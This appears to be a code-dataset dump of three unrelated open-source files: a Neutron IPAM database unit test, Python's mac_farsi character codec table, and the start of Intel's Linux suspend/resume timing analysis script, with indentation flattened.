db_pools = []
for pool in pools:
db_pool = self.subnet_manager.create_pool(self.ctx.session,
pool[0],
pool[1])
db_pools.append(db_pool)
return db_pools
def _validate_ips(self, pools, db_pool):
self.assertTrue(
any(pool == (db_pool.first_ip, db_pool.last_ip) for pool in pools))
def test_create_pool(self):
db_pools = self._create_pools([self.single_pool])
ipam_pool = self.ctx.session.query(db_models.IpamAllocationPool).\
filter_by(ipam_subnet_id=self.ipam_subnet_id).first()
self._validate_ips([self.single_pool], ipam_pool)
range = self.ctx.session.query(db_models.IpamAvailabilityRange).\
filter_by(allocation_pool_id=db_pools[0].id).first()
self._validate_ips([self.single_pool], range)
def _test_get_first_range(self, locking):
self._create_pools(self.multi_pool)
range = self.subnet_manager.get_first_range(self.ctx.session,
locking=locking)
self._validate_ips(self.multi_pool, range)
def test_get_first_range(self):
self._test_get_first_range(False)
def test_get_first_range_locking(self):
self._test_get_first_range(True)
def test_list_ranges_by_subnet_id(self):
self._create_pools(self.multi_pool)
db_ranges = self.subnet_manager.list_ranges_by_subnet_id(
self.ctx.session,
self.ipam_subnet_id).all()
self.assertEqual(2, len(db_ranges))
self.assertEqual(db_models.IpamAvailabilityRange, type(db_ranges[0]))
def test_list_ranges_by_allocation_pool(self):
db_pools = self._create_pools([self.single_pool])
# generate ids for allocation pools on flush
self.ctx.session.flush()
db_ranges = self.subnet_manager.list_ranges_by_allocation_pool(
self.ctx.session,
db_pools[0].id).all()
self.assertEqual(1, len(db_ranges))
self.assertEqual(db_models.IpamAvailabilityRange, type(db_ranges[0]))
self._validate_ips([self.single_pool], db_ranges[0])
def test_create_range(self):
self._create_pools([self.single_pool])
pool = self.ctx.session.query(db_models.IpamAllocationPool).\
filter_by(ipam_subnet_id=self.ipam_subnet_id).first()
self._validate_ips([self.single_pool], pool)
allocation_pool_id = pool.id
# delete the range
db_range = self.subnet_manager.list_ranges_by_allocation_pool(
self.ctx.session,
pool.id).first()
self._validate_ips([self.single_pool], db_range)
self.ctx.session.delete(db_range)
# create a new range
range_start = '1.2.3.5'
range_end = '1.2.3.9'
new_range = self.subnet_manager.create_range(self.ctx.session,
allocation_pool_id,
range_start,
range_end)
self.assertEqual(range_start, new_range.first_ip)
self.assertEqual(range_end, new_range.last_ip)
def test_check_unique_allocation(self):
self.assertTrue(self.subnet_manager.check_unique_allocation(
self.ctx.session, self.subnet_ip))
def test_check_unique_allocation_negative(self):
self.subnet_manager.create_allocation(self.ctx.session,
self.subnet_ip)
self.assertFalse(self.subnet_manager.check_unique_allocation(
self.ctx.session, self.subnet_ip))
def test_list_allocations(self):
ips = ['1.2.3.4', '1.2.3.6', '1.2.3.7']
for ip in ips:
self.subnet_manager.create_allocation(self.ctx.session, ip)
allocs = self.subnet_manager.list_allocations(self.ctx.session).all()
self.assertEqual(len(ips), len(allocs))
for allocation in allocs:
self.assertIn(allocation.ip_address, ips)
def _test_create_allocation(self):
self.subnet_manager.create_allocation(self.ctx.session,
self.subnet_ip)
alloc = self.ctx.session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self.ipam_subnet_id).all()
self.assertEqual(1, len(alloc))
self.assertEqual(self.subnet_ip, alloc[0].ip_address)
return alloc
def test_create_allocation(self):
self._test_create_allocation()
def test_delete_allocation(self):
allocs = self._test_create_allocation()
self.subnet_manager.delete_allocation(self.ctx.session,
allocs[0].ip_address)
allocs = self.ctx.session.query(db_models.IpamAllocation).filter_by(
ipam_subnet_id=self.ipam_subnet_id).all()
self.assertEqual(0, len(allocs))
|
apache-2.0
|
makermade/arm_android-19_arm-linux-androideabi-4.8
|
lib/python2.7/encodings/mac_farsi.py
|
593
|
15426
|
""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='mac-farsi',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> CONTROL CHARACTER
u'\x01' # 0x01 -> CONTROL CHARACTER
u'\x02' # 0x02 -> CONTROL CHARACTER
u'\x03' # 0x03 -> CONTROL CHARACTER
u'\x04' # 0x04 -> CONTROL CHARACTER
u'\x05' # 0x05 -> CONTROL CHARACTER
u'\x06' # 0x06 -> CONTROL CHARACTER
u'\x07' # 0x07 -> CONTROL CHARACTER
u'\x08' # 0x08 -> CONTROL CHARACTER
u'\t' # 0x09 -> CONTROL CHARACTER
u'\n' # 0x0A -> CONTROL CHARACTER
u'\x0b' # 0x0B -> CONTROL CHARACTER
u'\x0c' # 0x0C -> CONTROL CHARACTER
u'\r' # 0x0D -> CONTROL CHARACTER
u'\x0e' # 0x0E -> CONTROL CHARACTER
u'\x0f' # 0x0F -> CONTROL CHARACTER
u'\x10' # 0x10 -> CONTROL CHARACTER
u'\x11' # 0x11 -> CONTROL CHARACTER
u'\x12' # 0x12 -> CONTROL CHARACTER
u'\x13' # 0x13 -> CONTROL CHARACTER
u'\x14' # 0x14 -> CONTROL CHARACTER
u'\x15' # 0x15 -> CONTROL CHARACTER
u'\x16' # 0x16 -> CONTROL CHARACTER
u'\x17' # 0x17 -> CONTROL CHARACTER
u'\x18' # 0x18 -> CONTROL CHARACTER
u'\x19' # 0x19 -> CONTROL CHARACTER
u'\x1a' # 0x1A -> CONTROL CHARACTER
u'\x1b' # 0x1B -> CONTROL CHARACTER
u'\x1c' # 0x1C -> CONTROL CHARACTER
u'\x1d' # 0x1D -> CONTROL CHARACTER
u'\x1e' # 0x1E -> CONTROL CHARACTER
u'\x1f' # 0x1F -> CONTROL CHARACTER
u' ' # 0x20 -> SPACE, left-right
u'!' # 0x21 -> EXCLAMATION MARK, left-right
u'"' # 0x22 -> QUOTATION MARK, left-right
u'#' # 0x23 -> NUMBER SIGN, left-right
u'$' # 0x24 -> DOLLAR SIGN, left-right
u'%' # 0x25 -> PERCENT SIGN, left-right
u'&' # 0x26 -> AMPERSAND, left-right
u"'" # 0x27 -> APOSTROPHE, left-right
u'(' # 0x28 -> LEFT PARENTHESIS, left-right
u')' # 0x29 -> RIGHT PARENTHESIS, left-right
u'*' # 0x2A -> ASTERISK, left-right
u'+' # 0x2B -> PLUS SIGN, left-right
u',' # 0x2C -> COMMA, left-right; in Arabic-script context, displayed as 0x066C ARABIC THOUSANDS SEPARATOR
u'-' # 0x2D -> HYPHEN-MINUS, left-right
u'.' # 0x2E -> FULL STOP, left-right; in Arabic-script context, displayed as 0x066B ARABIC DECIMAL SEPARATOR
u'/' # 0x2F -> SOLIDUS, left-right
u'0' # 0x30 -> DIGIT ZERO; in Arabic-script context, displayed as 0x06F0 EXTENDED ARABIC-INDIC DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE; in Arabic-script context, displayed as 0x06F1 EXTENDED ARABIC-INDIC DIGIT ONE
u'2' # 0x32 -> DIGIT TWO; in Arabic-script context, displayed as 0x06F2 EXTENDED ARABIC-INDIC DIGIT TWO
u'3' # 0x33 -> DIGIT THREE; in Arabic-script context, displayed as 0x06F3 EXTENDED ARABIC-INDIC DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR; in Arabic-script context, displayed as 0x06F4 EXTENDED ARABIC-INDIC DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE; in Arabic-script context, displayed as 0x06F5 EXTENDED ARABIC-INDIC DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX; in Arabic-script context, displayed as 0x06F6 EXTENDED ARABIC-INDIC DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN; in Arabic-script context, displayed as 0x06F7 EXTENDED ARABIC-INDIC DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT; in Arabic-script context, displayed as 0x06F8 EXTENDED ARABIC-INDIC DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE; in Arabic-script context, displayed as 0x06F9 EXTENDED ARABIC-INDIC DIGIT NINE
u':' # 0x3A -> COLON, left-right
u';' # 0x3B -> SEMICOLON, left-right
u'<' # 0x3C -> LESS-THAN SIGN, left-right
u'=' # 0x3D -> EQUALS SIGN, left-right
u'>' # 0x3E -> GREATER-THAN SIGN, left-right
u'?' # 0x3F -> QUESTION MARK, left-right
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET, left-right
u'\\' # 0x5C -> REVERSE SOLIDUS, left-right
u']' # 0x5D -> RIGHT SQUARE BRACKET, left-right
u'^' # 0x5E -> CIRCUMFLEX ACCENT, left-right
u'_' # 0x5F -> LOW LINE, left-right
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET, left-right
u'|' # 0x7C -> VERTICAL LINE, left-right
u'}' # 0x7D -> RIGHT CURLY BRACKET, left-right
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> CONTROL CHARACTER
u'\xc4' # 0x80 -> LATIN CAPITAL LETTER A WITH DIAERESIS
u'\xa0' # 0x81 -> NO-BREAK SPACE, right-left
u'\xc7' # 0x82 -> LATIN CAPITAL LETTER C WITH CEDILLA
u'\xc9' # 0x83 -> LATIN CAPITAL LETTER E WITH ACUTE
u'\xd1' # 0x84 -> LATIN CAPITAL LETTER N WITH TILDE
u'\xd6' # 0x85 -> LATIN CAPITAL LETTER O WITH DIAERESIS
u'\xdc' # 0x86 -> LATIN CAPITAL LETTER U WITH DIAERESIS
u'\xe1' # 0x87 -> LATIN SMALL LETTER A WITH ACUTE
u'\xe0' # 0x88 -> LATIN SMALL LETTER A WITH GRAVE
u'\xe2' # 0x89 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
u'\xe4' # 0x8A -> LATIN SMALL LETTER A WITH DIAERESIS
u'\u06ba' # 0x8B -> ARABIC LETTER NOON GHUNNA
u'\xab' # 0x8C -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK, right-left
u'\xe7' # 0x8D -> LATIN SMALL LETTER C WITH CEDILLA
u'\xe9' # 0x8E -> LATIN SMALL LETTER E WITH ACUTE
u'\xe8' # 0x8F -> LATIN SMALL LETTER E WITH GRAVE
u'\xea' # 0x90 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
u'\xeb' # 0x91 -> LATIN SMALL LETTER E WITH DIAERESIS
u'\xed' # 0x92 -> LATIN SMALL LETTER I WITH ACUTE
u'\u2026' # 0x93 -> HORIZONTAL ELLIPSIS, right-left
u'\xee' # 0x94 -> LATIN SMALL LETTER I WITH CIRCUMFLEX
u'\xef' # 0x95 -> LATIN SMALL LETTER I WITH DIAERESIS
u'\xf1' # 0x96 -> LATIN SMALL LETTER N WITH TILDE
u'\xf3' # 0x97 -> LATIN SMALL LETTER O WITH ACUTE
u'\xbb' # 0x98 -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK, right-left
u'\xf4' # 0x99 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
u'\xf6' # 0x9A -> LATIN SMALL LETTER O WITH DIAERESIS
u'\xf7' # 0x9B -> DIVISION SIGN, right-left
u'\xfa' # 0x9C -> LATIN SMALL LETTER U WITH ACUTE
u'\xf9' # 0x9D -> LATIN SMALL LETTER U WITH GRAVE
u'\xfb' # 0x9E -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0x9F -> LATIN SMALL LETTER U WITH DIAERESIS
u' ' # 0xA0 -> SPACE, right-left
u'!' # 0xA1 -> EXCLAMATION MARK, right-left
u'"' # 0xA2 -> QUOTATION MARK, right-left
u'#' # 0xA3 -> NUMBER SIGN, right-left
u'$' # 0xA4 -> DOLLAR SIGN, right-left
u'\u066a' # 0xA5 -> ARABIC PERCENT SIGN
u'&' # 0xA6 -> AMPERSAND, right-left
u"'" # 0xA7 -> APOSTROPHE, right-left
u'(' # 0xA8 -> LEFT PARENTHESIS, right-left
u')' # 0xA9 -> RIGHT PARENTHESIS, right-left
u'*' # 0xAA -> ASTERISK, right-left
u'+' # 0xAB -> PLUS SIGN, right-left
u'\u060c' # 0xAC -> ARABIC COMMA
u'-' # 0xAD -> HYPHEN-MINUS, right-left
u'.' # 0xAE -> FULL STOP, right-left
u'/' # 0xAF -> SOLIDUS, right-left
u'\u06f0' # 0xB0 -> EXTENDED ARABIC-INDIC DIGIT ZERO, right-left (need override)
u'\u06f1' # 0xB1 -> EXTENDED ARABIC-INDIC DIGIT ONE, right-left (need override)
u'\u06f2' # 0xB2 -> EXTENDED ARABIC-INDIC DIGIT TWO, right-left (need override)
u'\u06f3' # 0xB3 -> EXTENDED ARABIC-INDIC DIGIT THREE, right-left (need override)
u'\u06f4' # 0xB4 -> EXTENDED ARABIC-INDIC DIGIT FOUR, right-left (need override)
u'\u06f5' # 0xB5 -> EXTENDED ARABIC-INDIC DIGIT FIVE, right-left (need override)
u'\u06f6' # 0xB6 -> EXTENDED ARABIC-INDIC DIGIT SIX, right-left (need override)
u'\u06f7' # 0xB7 -> EXTENDED ARABIC-INDIC DIGIT SEVEN, right-left (need override)
u'\u06f8' # 0xB8 -> EXTENDED ARABIC-INDIC DIGIT EIGHT, right-left (need override)
u'\u06f9' # 0xB9 -> EXTENDED ARABIC-INDIC DIGIT NINE, right-left (need override)
u':' # 0xBA -> COLON, right-left
u'\u061b' # 0xBB -> ARABIC SEMICOLON
u'<' # 0xBC -> LESS-THAN SIGN, right-left
u'=' # 0xBD -> EQUALS SIGN, right-left
u'>' # 0xBE -> GREATER-THAN SIGN, right-left
u'\u061f' # 0xBF -> ARABIC QUESTION MARK
u'\u274a' # 0xC0 -> EIGHT TEARDROP-SPOKED PROPELLER ASTERISK, right-left
u'\u0621' # 0xC1 -> ARABIC LETTER HAMZA
u'\u0622' # 0xC2 -> ARABIC LETTER ALEF WITH MADDA ABOVE
u'\u0623' # 0xC3 -> ARABIC LETTER ALEF WITH HAMZA ABOVE
u'\u0624' # 0xC4 -> ARABIC LETTER WAW WITH HAMZA ABOVE
u'\u0625' # 0xC5 -> ARABIC LETTER ALEF WITH HAMZA BELOW
u'\u0626' # 0xC6 -> ARABIC LETTER YEH WITH HAMZA ABOVE
u'\u0627' # 0xC7 -> ARABIC LETTER ALEF
u'\u0628' # 0xC8 -> ARABIC LETTER BEH
u'\u0629' # 0xC9 -> ARABIC LETTER TEH MARBUTA
u'\u062a' # 0xCA -> ARABIC LETTER TEH
u'\u062b' # 0xCB -> ARABIC LETTER THEH
u'\u062c' # 0xCC -> ARABIC LETTER JEEM
u'\u062d' # 0xCD -> ARABIC LETTER HAH
u'\u062e' # 0xCE -> ARABIC LETTER KHAH
u'\u062f' # 0xCF -> ARABIC LETTER DAL
u'\u0630' # 0xD0 -> ARABIC LETTER THAL
u'\u0631' # 0xD1 -> ARABIC LETTER REH
u'\u0632' # 0xD2 -> ARABIC LETTER ZAIN
u'\u0633' # 0xD3 -> ARABIC LETTER SEEN
u'\u0634' # 0xD4 -> ARABIC LETTER SHEEN
u'\u0635' # 0xD5 -> ARABIC LETTER SAD
u'\u0636' # 0xD6 -> ARABIC LETTER DAD
u'\u0637' # 0xD7 -> ARABIC LETTER TAH
u'\u0638' # 0xD8 -> ARABIC LETTER ZAH
u'\u0639' # 0xD9 -> ARABIC LETTER AIN
u'\u063a' # 0xDA -> ARABIC LETTER GHAIN
u'[' # 0xDB -> LEFT SQUARE BRACKET, right-left
u'\\' # 0xDC -> REVERSE SOLIDUS, right-left
u']' # 0xDD -> RIGHT SQUARE BRACKET, right-left
u'^' # 0xDE -> CIRCUMFLEX ACCENT, right-left
u'_' # 0xDF -> LOW LINE, right-left
u'\u0640' # 0xE0 -> ARABIC TATWEEL
u'\u0641' # 0xE1 -> ARABIC LETTER FEH
u'\u0642' # 0xE2 -> ARABIC LETTER QAF
u'\u0643' # 0xE3 -> ARABIC LETTER KAF
u'\u0644' # 0xE4 -> ARABIC LETTER LAM
u'\u0645' # 0xE5 -> ARABIC LETTER MEEM
u'\u0646' # 0xE6 -> ARABIC LETTER NOON
u'\u0647' # 0xE7 -> ARABIC LETTER HEH
u'\u0648' # 0xE8 -> ARABIC LETTER WAW
u'\u0649' # 0xE9 -> ARABIC LETTER ALEF MAKSURA
u'\u064a' # 0xEA -> ARABIC LETTER YEH
u'\u064b' # 0xEB -> ARABIC FATHATAN
u'\u064c' # 0xEC -> ARABIC DAMMATAN
u'\u064d' # 0xED -> ARABIC KASRATAN
u'\u064e' # 0xEE -> ARABIC FATHA
u'\u064f' # 0xEF -> ARABIC DAMMA
u'\u0650' # 0xF0 -> ARABIC KASRA
u'\u0651' # 0xF1 -> ARABIC SHADDA
u'\u0652' # 0xF2 -> ARABIC SUKUN
u'\u067e' # 0xF3 -> ARABIC LETTER PEH
u'\u0679' # 0xF4 -> ARABIC LETTER TTEH
u'\u0686' # 0xF5 -> ARABIC LETTER TCHEH
u'\u06d5' # 0xF6 -> ARABIC LETTER AE
u'\u06a4' # 0xF7 -> ARABIC LETTER VEH
u'\u06af' # 0xF8 -> ARABIC LETTER GAF
u'\u0688' # 0xF9 -> ARABIC LETTER DDAL
u'\u0691' # 0xFA -> ARABIC LETTER RREH
u'{' # 0xFB -> LEFT CURLY BRACKET, right-left
u'|' # 0xFC -> VERTICAL LINE, right-left
u'}' # 0xFD -> RIGHT CURLY BRACKET, right-left
u'\u0698' # 0xFE -> ARABIC LETTER JEH
u'\u06d2' # 0xFF -> ARABIC LETTER YEH BARREE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
gpl-2.0
|
klock-android/linux
|
scripts/analyze_suspend.py
|
1537
|
120394
|
#!/usr/bin/python
#
# Tool for analyzing suspend/resume timing
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors:
# Todd Brandt <todd.e.brandt@linux.intel.com>
#
# Description:
# This tool is designed to assist kernel and OS developers in optimizing
# their linux stack's suspend/resume time. Using a kernel image built
# with a few extra options enabled, the tool will execute a suspend and
# will capture dmesg and ftrace data until resume is complete. This data
# is transformed into a device timeline and a callgraph to give a quick
# and detailed view of which devices and callbacks are taking the most
# time in suspend/resume. The output is a single html file which can be
# viewed in firefox or chrome.
#
# The following kernel build options are required:
# CONFIG_PM_DEBUG=y
# CONFIG_PM_SLEEP_DEBUG=y
# CONFIG_FTRACE=y
# CONFIG_FUNCTION_TRACER=y
# CONFIG_FUNCTION_GRAPH_TRACER=y
#
# For kernel versions older than 3.15:
# The following additional kernel parameters are required:
# (e.g. in file /etc/default/grub)
# GRUB_CMDLINE_LINUX_DEFAULT="... initcall_debug log_buf_len=16M ..."
#
# ----------------- LIBRARIES --------------------
import sys
import time
import os
import string
import re
import platform
from datetime import datetime
import struct
# ----------------- CLASSES --------------------
# Class: SystemValues
# Description:
# A global, single-instance container used to
# store system values and test parameters
class SystemValues:
version = 3.0
verbose = False
testdir = '.'
tpath = '/sys/kernel/debug/tracing/'
fpdtpath = '/sys/firmware/acpi/tables/FPDT'
epath = '/sys/kernel/debug/tracing/events/power/'
traceevents = [
'suspend_resume',
'device_pm_callback_end',
'device_pm_callback_start'
]
modename = {
'freeze': 'Suspend-To-Idle (S0)',
'standby': 'Power-On Suspend (S1)',
'mem': 'Suspend-to-RAM (S3)',
'disk': 'Suspend-to-disk (S4)'
}
mempath = '/dev/mem'
powerfile = '/sys/power/state'
suspendmode = 'mem'
hostname = 'localhost'
prefix = 'test'
teststamp = ''
dmesgfile = ''
ftracefile = ''
htmlfile = ''
rtcwake = False
rtcwaketime = 10
rtcpath = ''
android = False
adb = 'adb'
devicefilter = []
stamp = 0
execcount = 1
x2delay = 0
usecallgraph = False
usetraceevents = False
usetraceeventsonly = False
notestrun = False
altdevname = dict()
postresumetime = 0
tracertypefmt = '# tracer: (?P<t>.*)'
firmwarefmt = '# fwsuspend (?P<s>[0-9]*) fwresume (?P<r>[0-9]*)$'
postresumefmt = '# post resume time (?P<t>[0-9]*)$'
stampfmt = '# suspend-(?P<m>[0-9]{2})(?P<d>[0-9]{2})(?P<y>[0-9]{2})-'+\
'(?P<H>[0-9]{2})(?P<M>[0-9]{2})(?P<S>[0-9]{2})'+\
' (?P<host>.*) (?P<mode>.*) (?P<kernel>.*)$'
def __init__(self):
self.hostname = platform.node()
if(self.hostname == ''):
self.hostname = 'localhost'
rtc = "rtc0"
if os.path.exists('/dev/rtc'):
rtc = os.readlink('/dev/rtc')
rtc = '/sys/class/rtc/'+rtc
if os.path.exists(rtc) and os.path.exists(rtc+'/date') and \
os.path.exists(rtc+'/time') and os.path.exists(rtc+'/wakealarm'):
self.rtcpath = rtc
def setOutputFile(self):
if((self.htmlfile == '') and (self.dmesgfile != '')):
m = re.match('(?P<name>.*)_dmesg\.txt$', self.dmesgfile)
if(m):
self.htmlfile = m.group('name')+'.html'
if((self.htmlfile == '') and (self.ftracefile != '')):
m = re.match('(?P<name>.*)_ftrace\.txt$', self.ftracefile)
if(m):
self.htmlfile = m.group('name')+'.html'
if(self.htmlfile == ''):
self.htmlfile = 'output.html'
def initTestOutput(self, subdir):
if(not self.android):
self.prefix = self.hostname
v = open('/proc/version', 'r').read().strip()
kver = string.split(v)[2]
else:
self.prefix = 'android'
v = os.popen(self.adb+' shell cat /proc/version').read().strip()
kver = string.split(v)[2]
testtime = datetime.now().strftime('suspend-%m%d%y-%H%M%S')
if(subdir != "."):
self.testdir = subdir+"/"+testtime
else:
self.testdir = testtime
self.teststamp = \
'# '+testtime+' '+self.prefix+' '+self.suspendmode+' '+kver
self.dmesgfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_dmesg.txt'
self.ftracefile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_ftrace.txt'
self.htmlfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'.html'
os.mkdir(self.testdir)
def setDeviceFilter(self, devnames):
self.devicefilter = string.split(devnames)
def rtcWakeAlarm(self):
os.system('echo 0 > '+self.rtcpath+'/wakealarm')
outD = open(self.rtcpath+'/date', 'r').read().strip()
outT = open(self.rtcpath+'/time', 'r').read().strip()
mD = re.match('^(?P<y>[0-9]*)-(?P<m>[0-9]*)-(?P<d>[0-9]*)', outD)
mT = re.match('^(?P<h>[0-9]*):(?P<m>[0-9]*):(?P<s>[0-9]*)', outT)
if(mD and mT):
# get the current time from hardware
utcoffset = int((datetime.now() - datetime.utcnow()).total_seconds())
dt = datetime(\
int(mD.group('y')), int(mD.group('m')), int(mD.group('d')),
int(mT.group('h')), int(mT.group('m')), int(mT.group('s')))
nowtime = int(dt.strftime('%s')) + utcoffset
else:
# if hardware time fails, use the software time
nowtime = int(datetime.now().strftime('%s'))
alarm = nowtime + self.rtcwaketime
os.system('echo %d > %s/wakealarm' % (alarm, self.rtcpath))
sysvals = SystemValues()
# Class: DeviceNode
# Description:
# A container used to create a device hierachy, with a single root node
# and a tree of child nodes. Used by Data.deviceTopology()
class DeviceNode:
name = ''
children = 0
depth = 0
def __init__(self, nodename, nodedepth):
self.name = nodename
self.children = []
self.depth = nodedepth
# Class: Data
# Description:
# The primary container for suspend/resume test data. There is one for
# each test run. The data is organized into a cronological hierarchy:
# Data.dmesg {
# root structure, started as dmesg & ftrace, but now only ftrace
# contents: times for suspend start/end, resume start/end, fwdata
# phases {
# 10 sequential, non-overlapping phases of S/R
# contents: times for phase start/end, order/color data for html
# devlist {
# device callback or action list for this phase
# device {
# a single device callback or generic action
# contents: start/stop times, pid/cpu/driver info
# parents/children, html id for timeline/callgraph
# optionally includes an ftrace callgraph
# optionally includes intradev trace events
# }
# }
# }
# }
#
class Data:
dmesg = {} # root data structure
phases = [] # ordered list of phases
start = 0.0 # test start
end = 0.0 # test end
tSuspended = 0.0 # low-level suspend start
tResumed = 0.0 # low-level resume start
tLow = 0.0 # time spent in low-level suspend (standby/freeze)
fwValid = False # is firmware data available
fwSuspend = 0 # time spent in firmware suspend
fwResume = 0 # time spent in firmware resume
dmesgtext = [] # dmesg text file in memory
testnumber = 0
idstr = ''
html_device_id = 0
stamp = 0
outfile = ''
def __init__(self, num):
idchar = 'abcdefghijklmnopqrstuvwxyz'
self.testnumber = num
self.idstr = idchar[num]
self.dmesgtext = []
self.phases = []
self.dmesg = { # fixed list of 10 phases
'suspend_prepare': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#CCFFCC', 'order': 0},
'suspend': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#88FF88', 'order': 1},
'suspend_late': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#00AA00', 'order': 2},
'suspend_noirq': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#008888', 'order': 3},
'suspend_machine': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#0000FF', 'order': 4},
'resume_machine': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FF0000', 'order': 5},
'resume_noirq': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FF9900', 'order': 6},
'resume_early': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFCC00', 'order': 7},
'resume': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFFF88', 'order': 8},
'resume_complete': {'list': dict(), 'start': -1.0, 'end': -1.0,
'row': 0, 'color': '#FFFFCC', 'order': 9}
}
self.phases = self.sortedPhases()
def getStart(self):
return self.dmesg[self.phases[0]]['start']
def setStart(self, time):
self.start = time
self.dmesg[self.phases[0]]['start'] = time
def getEnd(self):
return self.dmesg[self.phases[-1]]['end']
def setEnd(self, time):
self.end = time
self.dmesg[self.phases[-1]]['end'] = time
def isTraceEventOutsideDeviceCalls(self, pid, time):
for phase in self.phases:
list = self.dmesg[phase]['list']
for dev in list:
d = list[dev]
if(d['pid'] == pid and time >= d['start'] and
time <= d['end']):
return False
return True
